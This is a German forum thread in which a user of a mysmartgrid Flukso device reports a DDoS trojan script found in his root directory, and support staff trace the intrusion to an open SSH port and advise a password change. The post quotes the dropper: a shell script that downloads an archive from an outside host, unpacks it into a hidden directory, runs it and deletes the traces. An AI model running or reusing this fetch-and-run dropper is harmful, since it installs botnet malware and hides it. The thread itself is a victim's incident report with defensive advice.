DDoS Trojaner-Script

Error message

Achtung: Sie benutzen einen veralteten Browser. Einige Teile von mysmartgrid.de können daher in ihrer Funktion beeinträchtigt sein. Bitte installieren Sie einen dieser Browser: Internet Explorer 8, Firefox 3, Safari 4, Chrome 15, Chromium 15, Opera Mobile 11, Android 2.3.4, Android 4.1 (oder eine neuere Version).

Hallo,

am 23.12.11 wurde ein DDoS-Script heruntergeladen und gestartet.

Auszug aus dem Script:
....
echo "2e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f62e61e112030709378914f8280fd09f6"
....
Script:
#!/bin/sh
clear
wget http://d3v1lz.at.ua/DvLz-T34m.tar.gz
tar -zxvf DvLz-T34m.tar.gz
rm -rf DvLz-T34m.tar.gz
killall -9 addict
mv DvLz-T34m .dt
chmod +x .dt
cd .dt
chmod +x *
./start.sh
clear
cd
rm -rf DvLz-T34m
...

Offensichtlich konnte die gepackte Datei (44.006.074 Byte) nicht ausgepackt werden.

Muss man was unternehmen? Wie kann man solche Attacken vermeiden?

Kann man das Root-PW ohne Risiko verändern?

Viele Grüße Heinz

Hallo Heinz

Wie und wo genau haben Sie dieses Skript gefunden?

Viele Grüße

Ely

Hallo,

das Script und das Installpaket habe ich im Verzeichnis \Root gefunden.

Viele Grüße Heinz

Hallo,

das Problem wurde mit Hilfe von Herr Krueger gelöst.

Ursache war ein offener SSH-Port 22 über den der Angriff möglich war.

Vielen Dank für die schnelle Hilfe.

Viele Grüße Heinz

Beitrag auf Wunsch des Benutzers gelöscht.

Hallo,

Bei einem neuen DSL-Router wird der Zugriff von außen durch eine Firewall verhindert. Solange dies nicht geändert wird, ist obiger Angriff nicht möglich.

Zur Verbesserung der Sicherheit ist es jedoch ratsam das Passwort des Flukso zu ändern. Dies muss zur Zeit noch via SSH geschehen. Wir arbeiten jedoch an einem neuen Webinterface, welches das Setzen eines neuen Passwortes vereinfachen soll.

Gruß
Stephan